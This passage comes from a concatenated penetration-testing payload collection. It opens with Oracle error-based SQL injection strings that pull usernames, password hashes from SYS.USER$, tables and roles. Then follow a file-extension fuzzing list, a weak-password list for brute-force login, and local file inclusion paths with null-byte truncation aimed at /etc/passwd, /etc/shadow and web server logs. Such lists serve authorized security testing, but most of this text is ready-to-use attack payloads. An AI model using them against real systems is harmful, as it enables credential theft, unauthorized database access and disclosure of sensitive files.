27 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
28 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
29 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
30 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
31 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
32 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
33 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
34 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
35 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
36 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
37 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
38 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
39 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
40 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
41 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
42 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
43 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
44 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
45 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
46 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
47 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
48 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
49 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
50 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
51 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
52 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
53 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
54 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
55 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
56 |
57 |
--------------------------------------------------------------------------------
/信息探测/FilenameBruteforce/Extensions.Common.fuzz.txt:
--------------------------------------------------------------------------------
1 | $er
2 | 123
3 | 1pe
4 | 1ph
5 | 3dr
6 | 3dt
7 | 3me
8 | 3pe
9 | 4dl
10 | 4dv
11 | 8xk
12 | ^^^
13 | a3l
14 | a3m
15 | a3w
16 | a4l
17 | a4m
18 | a4w
19 | a5l
20 | a5w
21 | a65
22 | aao
23 | ab
24 | ab1
25 | ab2
26 | ab3
27 | abcd
28 | abi
29 | abp
30 | aby
31 | aca
32 | acc
33 | accdb
34 | acf
35 | acg
36 | ade
37 | adp
38 | adt
39 | adx
40 | aft
41 | agd
42 | aifb
43 | alc
44 | ald
45 | ali
46 | amb
47 | amsorm
48 | an1
49 | anme
50 | apr
51 | arc
52 | arh
53 | ask
54 | asm
55 | ast
56 | at5
57 | att
58 | aw
59 | awg
60 | azw
61 | bafl
62 | bci
63 | bcm
64 | bdf
65 | bdic
66 | bfx
67 | bgl
68 | bgt
69 | bin
70 | bjo
71 | bk
72 | bkk
73 | blb
74 | bld
75 | blg
76 | bok
77 | box
78 | brd
79 | brw
80 | btf
81 | btif
82 | btm
83 | btr
84 | cap
85 | cat
86 | cbg
87 | cch
88 | ccr
89 | cct
90 | cdb
91 | cdd
92 | cdf
93 | cdp
94 | cdr
95 | cdx
96 | cel
97 | celtx
98 | chg
99 | chk
100 | chn
101 | ckd
102 | ckt
103 | cl2
104 | cl4
105 | clb
106 | clix
107 | clm
108 | clp
109 | cmbl
110 | cna
111 | contact
112 | cpi
113 | cpmz
114 | crd
115 | crtx
116 | csa
117 | csv
118 | ctf
119 | ctt
120 | cursorfx
121 | curxptheme
122 | cvd
123 | cvn
124 | cwk
125 | cws
126 | cwz
127 | cxt
128 | cyo
129 | cys
130 | daf
131 | dal
132 | dam
133 | das
134 | dat
135 | data
136 | db
137 | db2
138 | db3
139 | dbc
140 | dbd
141 | dbf
142 | dbx
143 | dcf
144 | dcl
145 | dcm
146 | dcmd
147 | ddc
148 | ddcx
149 | ddt
150 | dem
151 | des
152 | dex
153 | dfm
154 | dfproj
155 | dft
156 | dgb
157 | dif
158 | dii
159 | dlg
160 | dm2
161 | dmo
162 | dmsk
163 | dnc
164 | dockzip
165 | dp1
166 | dpn
167 | dpx
168 | drl
169 | dsb
170 | dsd
171 | dsk
172 | dsy
173 | dsz
174 | dt0
175 | dt1
176 | dt2
177 | dta
178 | dtr
179 | dvdproj
180 | dvo
181 | dwi
182 | e00
183 | eap
184 | ebuild
185 | ec0
186 | eco
187 | ecx
188 | edb
189 | edf
190 | eep
191 | efx
192 | egp
193 | emb
194 | emd
195 | emlxpart
196 | enc
197 | enw
198 | epp
199 | epub
200 | epw
201 | er1
202 | esp
203 | ess
204 | est
205 | esx
206 | et
207 | eta
208 | etd
209 | etl
210 | ev
211 | ev3
212 | evt
213 | evy
214 | exif
215 | exp
216 | exx
217 | fa
218 | fasta
219 | fbl
220 | fcd
221 | fcs
222 | fdb
223 | ffd
224 | ffwp
225 | fhc
226 | fid
227 | fil
228 | flame
229 | fll
230 | flo
231 | flp
232 | flt
233 | fm
234 | fm5
235 | fmp
236 | fo
237 | fob
238 | fol
239 | fop
240 | fox
241 | fp
242 | fp3
243 | fp4
244 | fp5
245 | fp7
246 | frl
247 | frm
248 | fro
249 | frx
250 | fsb
251 | fsc
252 | ftm
253 | ftw
254 | gan
255 | gbr
256 | gc
257 | gcx
258 | gdb
259 | ged
260 | gedcom
261 | gen
262 | ggb
263 | gml
264 | gms
265 | gno
266 | gnp
267 | gp3
268 | gpi
269 | gps
270 | gpx
271 | gra
272 | grade
273 | grf
274 | grib
275 | grk
276 | grr
277 | grv
278 | gs
279 | gst
280 | gtp
281 | gwk
282 | gxl
283 | hcc
284 | hce
285 | hci
286 | hcp
287 | hcr
288 | hcu
289 | hda
290 | hdb
291 | hdf
292 | hdi
293 | hdl
294 | hif
295 | hl
296 | hml
297 | hmt
298 | hs2
299 | hsk
300 | hst
301 | htg
302 | huh
303 | hyv
304 | i5z
305 | ib
306 | ics
307 | id2
308 | idx
309 | igc
310 | ihx
311 | ii
312 | iif
313 | img
314 | imt
315 | ink
316 | inp
317 | ins
318 | ip
319 | irock
320 | irr
321 | irx
322 | isf
323 | itdb
324 | itl
325 | itm
326 | itn
327 | itw
328 | itx
329 | ivt
330 | iw
331 | ixb
332 | jasper
333 | jdb
334 | jef
335 | jmp
336 | jnt
337 | job
338 | joboptions
339 | joined
340 | jph
341 | jrprint
342 | jrxml
343 | jude
344 | kap
345 | kdb
346 | kid
347 | kismac
348 | kmz
349 | kpf
350 | kpp
351 | kpr
352 | kpx
353 | kpz
354 | l
355 | l6t
356 | laccdb
357 | lbl
358 | lbx
359 | lcd
360 | lcf
361 | lcm
362 | ldif
363 | lex
364 | lgc
365 | lgf
366 | lgh
367 | lgi
368 | lgl
369 | lib
370 | lif
371 | livereg
372 | liveupdate
373 | lix
374 | llb
375 | lms
376 | lmx
377 | lnt
378 | loc
379 | lp7
380 | lrf
381 | lrs
382 | lrx
383 | lsf
384 | lsl
385 | lsp
386 | lsr
387 | lst
388 | lsu
389 | lvm
390 | lw4
391 | ly
392 | m
393 | mag
394 | mai
395 | map
396 | masseffectprofile
397 | mat
398 | mbb
399 | mbf
400 | mbg
401 | mbl
402 | mbp
403 | mbx
404 | mc1
405 | mc9
406 | mcd
407 | md
408 | mdb
409 | mdc
410 | mdf
411 | mdl
412 | mdm
413 | mdn
414 | mdt
415 | mdx
416 | mdz
417 | mem
418 | menc
419 | met
420 | mex
421 | mfo
422 | mfp
423 | mgc
424 | mls
425 | mm
426 | mmap
427 | mmc
428 | mmf
429 | mmp
430 | mnc
431 | mng
432 | mnk
433 | mno
434 | mny
435 | mobi
436 | moho
437 | mosaic
438 | mox
439 | mpd
440 | mpj
441 | mpp
442 | mpt
443 | mpx
444 | mpz
445 | mq4
446 | ms10
447 | mth
448 | mtw
449 | mud
450 | muf
451 | mw
452 | mwf
453 | mws
454 | mwx
455 | mxd
456 | myd
457 | myi
458 | nb
459 | nc
460 | ndf
461 | ndk
462 | ndx
463 | net
464 | neta
465 | nfo
466 | nitf
467 | nmind
468 | not
469 | notebook
470 | np
471 | npl
472 | npt
473 | nrl
474 | ns2
475 | ns3
476 | ns4
477 | nsf
478 | ntx
479 | numbers
480 | nvl
481 | nyf
482 | oab
483 | obj
484 | odb
485 | odf
486 | odp
487 | ods
488 | odx
489 | oeaccount
490 | ofc
491 | ofm
492 | oft
493 | ofx
494 | omcs
495 | omp
496 | ond
497 | one
498 | oo3
499 | opf
500 | opx
501 | or2
502 | or3
503 | or4
504 | or5
505 | or6
506 | org
507 | orx
508 | otf
509 | otl
510 | otln
511 | ots
512 | out
513 | ov2
514 | ova
515 | ovf
516 | p96
517 | p97
518 | pab
519 | paf
520 | pan
521 | pbd
522 | pc
523 | pcap
524 | pcb
525 | pcr
526 | pd4
527 | pd5
528 | pdas
529 | pdb
530 | pdd
531 | pdm
532 | pds
533 | pdx
534 | peb
535 | pec
536 | pep
537 | pex
538 | pfc
539 | pfl
540 | phb
541 | phm
542 | pi
543 | pis
544 | pjx
545 | pka
546 | pkb
547 | pkh
548 | pks
549 | pkt
550 | pln
551 | plw
552 | pmo
553 | pmr
554 | pnproj
555 | pnpt
556 | pns
557 | pnt
558 | pod
559 | poi
560 | pos
561 | postal
562 | pot
563 | potm
564 | potx
565 | pp2
566 | ppf
567 | pps
568 | ppsx
569 | ppt
570 | pptm
571 | pptx
572 | prc
573 | pre
574 | prf
575 | prj
576 | prm
577 | prs
578 | psa
579 | psf
580 | psm
581 | pst
582 | ptb
583 | ptf
584 | ptk
585 | ptm
586 | ptn
587 | ptt
588 | ptz
589 | pvl
590 | pwd
591 | pxj
592 | pxl
593 | q07
594 | q08
595 | q09
596 | q3d
597 | qbw
598 | qdat
599 | qdf
600 | qdfm
601 | qel
602 | qfx
603 | qif
604 | qpb
605 | qpf
606 | qph
607 | qpm
608 | qpw
609 | qrp
610 | qsd
611 | ral
612 | rbt
613 | rcd
614 | rcg
615 | rdb
616 | rdf
617 | rdx
618 | ref
619 | ret
620 | rf1
621 | rfa
622 | rfo
623 | rge
624 | rgn
625 | rgo
626 | rmuf
627 | rnq
628 | rod
629 | rog
630 | roi
631 | rou
632 | rpp
633 | rpt
634 | rrt
635 | rsc
636 | rsd
637 | rsw
638 | rte
639 | rvt
640 | rwg
641 | rzb
642 | s85
643 | saf
644 | sam07
645 | sar
646 | sav
647 | sbd
648 | sbf
649 | sbq
650 | sbt
651 | sca
652 | scf
653 | sch
654 | sdb
655 | sdc
656 | sdf
657 | sdp
658 | sdq
659 | sds
660 | sen
661 | seo
662 | seq
663 | ser
664 | sgml
665 | sgn
666 | shp
667 | shs
668 | shx
669 | skc
670 | skv
671 | skx
672 | sle
673 | slk
674 | slp
675 | snapfireshow
676 | sonic
677 | soundpack
678 | spo
679 | sps
680 | spub
681 | spv
682 | sq
683 | sqd
684 | sql
685 | sqlite
686 | sqr
687 | sta
688 | stc
689 | stf
690 | stk
691 | stl
692 | stm
693 | stp
694 | str
695 | stt
696 | stw
697 | styk
698 | stykz
699 | swk
700 | sxc
701 | sxi
702 | sy3
703 | t01
704 | t02
705 | t03
706 | t04
707 | t05
708 | t06
709 | t07
710 | t08
711 | t09
712 | t2
713 | t3001
714 | tax2008
715 | tax2009
716 | tb
717 | tbk
718 | tbl
719 | tcc
720 | tcx
721 | tda
722 | tdl
723 | tdm
724 | tdt
725 | te
726 | te3
727 | teacher
728 | tef
729 | tet
730 | tfa
731 | tfd
732 | tfrd
733 | tjp
734 | tk3
735 | tkfl
736 | tmw
737 | tol
738 | topc
739 | tpb
740 | tps
741 | tr3
742 | tra
743 | trd
744 | trk
745 | trs
746 | trx
747 | tst
748 | tsv
749 | ttk
750 | txa
751 | txd
752 | txf
753 | uccapilog
754 | ud
755 | udb
756 | udeb
757 | uds
758 | ulf
759 | ulz
760 | update
761 | upoi
762 | usr
763 | uvf
764 | uwl
765 | val
766 | vbpf1
767 | vcd
768 | vce
769 | vcf
770 | vcs
771 | vdb
772 | vdx
773 | vfs
774 | vi
775 | vip
776 | vle
777 | vlg
778 | vmt
779 | voi
780 | vok
781 | vrd
782 | vscontent
783 | vsx
784 | vtx
785 | vxml
786 | w02
787 | wab
788 | wb1
789 | wb2
790 | wb3
791 | wdb
792 | wdq
793 | wea
794 | wfd
795 | wfm
796 | wgp
797 | wgt
798 | windowslivecontact
799 | wjr
800 | wk1
801 | wk2
802 | wk3
803 | wk4
804 | wk5
805 | wke
806 | wki
807 | wks
808 | wku
809 | wlmp
810 | wmdb
811 | wor
812 | wpc
813 | wpf
814 | wpo
815 | wq1
816 | wq2
817 | wtb
818 | wtr
819 | xbk
820 | xdb
821 | xdp
822 | xds
823 | xef
824 | xem
825 | xfd
826 | xfo
827 | xft
828 | xl
829 | xlc
830 | xlgc
831 | xlr
832 | xls
833 | xlsb
834 | xlsm
835 | xlsx
836 | xlt
837 | xltm
838 | xltx
839 | xlw
840 | xmcd
841 | xml
842 | xmlper
843 | xmpz
844 | xpg
845 | xpj
846 | xpm
847 | xpt
848 | xrp
849 | xsl
850 | xslt
851 | xsn
852 | xtm
853 | xtp
854 | xxd
855 | yam
856 | zap
857 | zdb
858 | zdc
859 | zix
860 | zmc
861 | zpl
862 | {pb
863 | ~hm
864 |
--------------------------------------------------------------------------------
/wordlists-user-passwd/passwds/weaksauce.txt:
--------------------------------------------------------------------------------
1 | !root
2 | 0
3 | 0000
4 | 1
5 | 10
6 | 100
7 | 11
8 | 1111
9 | 11111
10 | 111111
11 | 11111111
12 | 112233
13 | 12
14 | 1212
15 | 121212
16 | 123
17 | 123123
18 | 1234
19 | 12345
20 | 123456
21 | 123456
22 | 1234567
23 | 1234567
24 | 12345678
25 | 12345678
26 | 123456789
27 | 1234admin
28 | 123asdf
29 | 123go
30 | 13
31 | 1313
32 | 131313
33 | 14
34 | 15
35 | 16
36 | 17
37 | 18
38 | 19
39 | 2
40 | 20
41 | 2000
42 | 21
43 | 2112
44 | 22
45 | 2222
46 | 23
47 | 232323
48 | 24
49 | 25
50 | 26
51 | 27
52 | 28
53 | 29
54 | 3
55 | 30
56 | 31
57 | 32
58 | 33
59 | 3333
60 | 34
61 | 35
62 | 36
63 | 37
64 | 38
65 | 39
66 | 4
67 | 40
68 | 41
69 | 4128
70 | 42
71 | 43
72 | 4321
73 | 44
74 | 4444
75 | 45
76 | 46
77 | 47
78 | 48
79 | 49
80 | 5
81 | 50
82 | 51
83 | 5150
84 | 52
85 | 53
86 | 54
87 | 55
88 | 5555
89 | 56
90 | 57
91 | 58
92 | 59
93 | 6
94 | 60
95 | 61
96 | 62
97 | 63
98 | 64
99 | 65
100 | 654321
101 | 66
102 | 6666
103 | 666666
104 | 67
105 | 68
106 | 69
107 | 6969
108 | 696969
109 | 7
110 | 70
111 | 71
112 | 72
113 | 73
114 | 74
115 | 75
116 | 76
117 | 77
118 | 7777
119 | 777777
120 | 7777777
121 | 78
122 | 79
123 | 8
124 | 80
125 | 81
126 | 82
127 | 83
128 | 84
129 | 85
130 | 86
131 | 8675309
132 | 87
133 | 88
134 | 89
135 | 9
136 | 90
137 | 91
138 | 92
139 | 93
140 | 94
141 | 95
142 | 96
143 | 97
144 | 98
145 | 987654
146 | 99
147 | ADMIN
148 | Admin
149 | Admin
150 | Administator
151 | Demo
152 | KKKKKKK
153 | Manager
154 | PASSWORD
155 | Qwerty
156 | TEST
157 | aaaa
158 | aaaaaa
159 | abc123
160 | abd234
161 | abgrtyu
162 | access
163 | access14
164 | action
165 | adm
166 | admin
167 | admin
168 | administator
169 | administrator
170 | admn
171 | albert
172 | alex
173 | alexis
174 | amanda
175 | amateur
176 | andrea
177 | andrew
178 | angel
179 | angela
180 | angels
181 | animal
182 | anthony
183 | apollo
184 | apple
185 | apples
186 | arsenal
187 | arthur
188 | asdf
189 | asdf123
190 | asdfg
191 | asdfgh
192 | ashley
193 | asshole
194 | august
195 | austin
196 | baby
197 | backup
198 | backupexec
199 | badboy
200 | bailey
201 | banana
202 | barney
203 | baseball
204 | batman
205 | beach
206 | bear
207 | beaver
208 | beavis
209 | beer
210 | bigcock
211 | bigdaddy
212 | bigdick
213 | bigdog
214 | bigtits
215 | bill
216 | billy
217 | birdie
218 | bitch
219 | bitches
220 | biteme
221 | black
222 | blank
223 | blazer
224 | blonde
225 | blondes
226 | blowjob
227 | blowme
228 | blue
229 | bond007
230 | bonnie
231 | booboo
232 | boobs
233 | booger
234 | boomer
235 | booty
236 | boston
237 | brandon
238 | brandy
239 | braves
240 | brazil
241 | brian
242 | bronco
243 | broncos
244 | bubba
245 | buddy
246 | bulldog
247 | buster
248 | butter
249 | butthead
250 | calvin
251 | camaro
252 | cameron
253 | canada
254 | captain
255 | carlos
256 | carter
257 | casper
258 | changeme
259 | charles
260 | charlie
261 | cheese
262 | chelsea
263 | chester
264 | chevy
265 | chicago
266 | chicken
267 | chris
268 | cisco
269 | clustadm
270 | cluster
271 | cocacola
272 | cock
273 | coffee
274 | college
275 | compaq
276 | compaq
277 | computer
278 | cookie
279 | cookie123
280 | cool
281 | cooper
282 | correct
283 | corvette
284 | cowboy
285 | cowboys
286 | cream
287 | crystal
288 | cumming
289 | cumshot
290 | cunt
291 | dakota
292 | dallas
293 | daniel
294 | danielle
295 | dave
296 | david
297 | debbie
298 | default
299 | default
300 | dell
301 | demo
302 | dennis
303 | diablo
304 | diamond
305 | dick
306 | dirty
307 | dmz
308 | doctor
309 | doggie
310 | dolphin
311 | dolphins
312 | domino
313 | donald
314 | dragon
315 | dreams
316 | driver
317 | eagle
318 | eagle1
319 | eagles
320 | eatdirt
321 | edward
322 | einstein
323 | enjoy
324 | enter
325 | eric
326 | erotic
327 | exchadm
328 | exchange
329 | extreme
330 | falcon
331 | fender
332 | ferrari
333 | fiction
334 | fire
335 | firebird
336 | fish
337 | fishing
338 | florida
339 | flower
340 | flyers
341 | foobar
342 | football
343 | ford
344 | forever
345 | frank
346 | fred
347 | freddy
348 | freedom
349 | ftp
350 | fuck
351 | fucked
352 | fucker
353 | fucking
354 | fuckme
355 | fuckyou
356 | fuckyou1
357 | gandalf
358 | gateway
359 | gateway
360 | gators
361 | gemini
362 | george
363 | giants
364 | ginger
365 | girl
366 | girls
367 | god
368 | golden
369 | golf
370 | golfer
371 | gordon
372 | great
373 | green
374 | gregory
375 | guest
376 | guest
377 | guitar
378 | gunner
379 | guru
380 | hammer
381 | hannah
382 | happy
383 | hardcore
384 | harley
385 | heather
386 | hello
387 | helpme
388 | hentai
389 | hockey
390 | hooters
391 | horney
392 | horny
393 | hotdog
394 | house
395 | hunter
396 | hunting
397 | iceman
398 | iloveyou
399 | iloveyou1
400 | internet
401 | iwantu
402 | jack
403 | jackie
404 | jackson
405 | jaguar
406 | jake
407 | james
408 | japan
409 | jasmine
410 | jason
411 | jasper
412 | jennifer
413 | jeremy
414 | jessica
415 | john
416 | johnny
417 | johnson
418 | jordan
419 | joseph
420 | joshua
421 | juice
422 | junior
423 | justin
424 | kelly
425 | kevin
426 | killer
427 | king
428 | kitty
429 | knight
430 | ladies
431 | lakers
432 | lauren
433 | leather
434 | legend
435 | letmein
436 | little
437 | login
438 | london
439 | lotus
440 | love
441 | lover
442 | lovers
443 | lucky
444 | lust
445 | maddog
446 | madison
447 | maggie
448 | magic
449 | magnum
450 | mail
451 | manager
452 | marine
453 | mark
454 | marlboro
455 | martin
456 | marvin
457 | master
458 | matrix
459 | matt
460 | matthew
461 | maverick
462 | maxwell
463 | melissa
464 | member
465 | mercedes
466 | merlin
467 | michael
468 | michelle
469 | mickey
470 | midnight
471 | mike
472 | miller
473 | mine
474 | miss4you
475 | mistress
476 | money
477 | money
478 | monica
479 | monitor
480 | monkey
481 | monster
482 | morgan
483 | mother
484 | mountain
485 | movie
486 | muffin
487 | murphy
488 | music
489 | mustang
490 | naked
491 | nascar
492 | nathan
493 | naughty
494 | ncc1701
495 | neo
496 | newpass
497 | newuser
498 | newyork
499 | nicholas
500 | nicole
501 | nipple
502 | nipples
503 | no
504 | none
505 | nopassword
506 | notes
507 | office
508 | oliver
509 | oracle
510 | orange
511 | ou812
512 | paSSworD
513 | packers
514 | panther
515 | panties
516 | paris
517 | parker
518 | pass
519 | pass
520 | passcode
521 | passwd
522 | password
523 | password
524 | password!
525 | password1
526 | password1
527 | patrick
528 | paul
529 | peaches
530 | peanut
531 | penis
532 | pepper
533 | peter
534 | phantom
535 | phoenix
536 | player
537 | please
538 | poiqwe
539 | pookie
540 | porn
541 | porno
542 | porsche
543 | power
544 | prince
545 | princess
546 | print
547 | private
548 | purple
549 | pussies
550 | pussy
551 | qazwsx
552 | qweasd
553 | qwert
554 | qwerty
555 | qwerty
556 | qwertyui
557 | rabbit
558 | rachel
559 | racing
560 | raiders
561 | rainbow
562 | ranger
563 | rangers
564 | read
565 | rebecca
566 | redskins
567 | redsox
568 | redwings
569 | replicate
570 | richard
571 | robert
572 | rock
573 | rocket
574 | root
575 | rosebud
576 | runner
577 | rush2112
578 | russia
579 | sa
580 | samantha
581 | sammy
582 | samson
583 | sandra
584 | saturn
585 | scooby
586 | scooter
587 | scorpio
588 | scorpion
589 | scott
590 | seagate
591 | secret
592 | secret
593 | security
594 | setup
595 | sex
596 | sexsex
597 | sexy
598 | shadow
599 | shannon
600 | shaved
601 | shit
602 | sierra
603 | silver
604 | skippy
605 | slayer
606 | slut
607 | smith
608 | smokey
609 | snoopy
610 | soccer
611 | sophie
612 | space
613 | spanky
614 | sparky
615 | spider
616 | sql
617 | sqlexec
618 | squirt
619 | srinivas
620 | star
621 | stars
622 | startrek
623 | starwars
624 | steelers
625 | steve
626 | steven
627 | sticky
628 | stupid
629 | success
630 | suckit
631 | summer
632 | sunshine
633 | super
634 | superman
635 | superuser
636 | surfer
637 | swimming
638 | sydney
639 | sys
640 | sysadm
641 | sysadmin
642 | system
643 | taylor
644 | tech
645 | teens
646 | temp
647 | temp
648 | temp!
649 | temp123
650 | tennis
651 | teresa
652 | test
653 | test
654 | test!
655 | test123
656 | tester
657 | testing
658 | theman
659 | thomas
660 | thunder
661 | thx1138
662 | tiffany
663 | tiger
664 | tigers
665 | tigger
666 | time
667 | tits
668 | tivoli
669 | tmp
670 | tomcat
671 | toor
672 | top
673 | topgun
674 | toyota
675 | travis
676 | trouble
677 | trustno1
678 | tst
679 | tucker
680 | turtle
681 | united
682 | user
683 | vagina
684 | veritas
685 | victor
686 | victoria
687 | video
688 | viking
689 | viper
690 | virus
691 | voodoo
692 | voyager
693 | walter
694 | warrior
695 | web
696 | welcome
697 | whatever
698 | white
699 | william
700 | willie
701 | wilson
702 | winner
703 | winston
704 | winter
705 | wizard
706 | wolf
707 | women
708 | wordpass
709 | write
710 | www
711 | xavier
712 | xxx
713 | xxxx
714 | xxxxx
715 | xxxxxx
716 | xxxxxxxx
717 | yamaha
718 | yankee
719 | yankees
720 | yellow
721 | young
722 | zxcvbn
723 | zxcvbnm
724 | zzzzzz
725 |
--------------------------------------------------------------------------------
/文件包含测试/敏感文件包含(带截断).txt:
--------------------------------------------------------------------------------
1 | /etc/passwd%00
2 | /etc/passwd%00
3 | /etc/shadow%00
4 | /etc/group%00
5 | /etc/security/group%00
6 | /etc/security/passwd%00
7 | /etc/security/user%00
8 | /etc/security/environ%00
9 | /etc/security/limits%00
10 | /usr/lib/security/mkuser.default%00
11 | /apache/logs/access.log%00
12 | /apache/logs/error.log%00
13 | /apache/logs/access.log%00
14 | /apache/logs/error.log%00
15 | /apache/logs/access.log%00
16 | /etc/httpd/logs/acces_log%00
17 | /etc/httpd/logs/acces.log%00
18 | /etc/httpd/logs/error_log%00
19 | /etc/httpd/logs/error.log%00
20 | /var/www/logs/access_log%00
21 | /var/www/logs/access.log%00
22 | /usr/local/apache/logs/access_ log%00
23 | /usr/local/apache/logs/access. log%00
24 | /var/log/apache/access_log%00
25 | /var/log/apache2/access_log%00
26 | /var/log/apache/access.log%00
27 | /var/log/apache2/access.log%00
28 | /var/log/access_log%00
29 | /var/log/access.log%00
30 | /var/www/logs/error_log%00
31 | /var/www/logs/error.log%00
32 | /usr/local/apache/logs/error_log%00
33 | /usr/local/apache/logs/error.log%00
34 | /var/log/apache/error_log%00
35 | /var/log/apache2/error_log%00
36 | /var/log/apache/error.log%00
37 | /var/log/apache2/error.log%00
38 | /var/log/error_log%00
39 | /var/log/error.log%00
40 | /var/log/httpd/access_log%00
41 | /var/log/httpd/error_log%00
42 | /var/log/httpd/access_log%00
43 | /var/log/httpd/error_log%00
44 | /apache/logs/error.log%00
45 | /apache/logs/access.log%00
46 | /apache/logs/error.log%00
47 | /apache/logs/access.log%00
48 | /apache/logs/error.log%00
49 | /apache/logs/access.log%00
50 | /apache/logs/error.log%00
51 | /apache/logs/access.log%00
52 | /apache/logs/error.log%00
53 | /apache/logs/access.log%00
54 | /apache2/logs/error.log%00
55 | /apache2/logs/access.log%00
56 | /apache2/logs/error.log%00
57 | /apache2/logs/access.log%00
58 | /apache2/logs/error.log%00
59 | /apache2/logs/access.log%00
60 | /apache2/logs/error.log%00
61 | /apache2/logs/access.log%00
62 | /apache2/logs/error.log%00
63 | /apache2/logs/access.log%00
64 | /logs/error.log%00
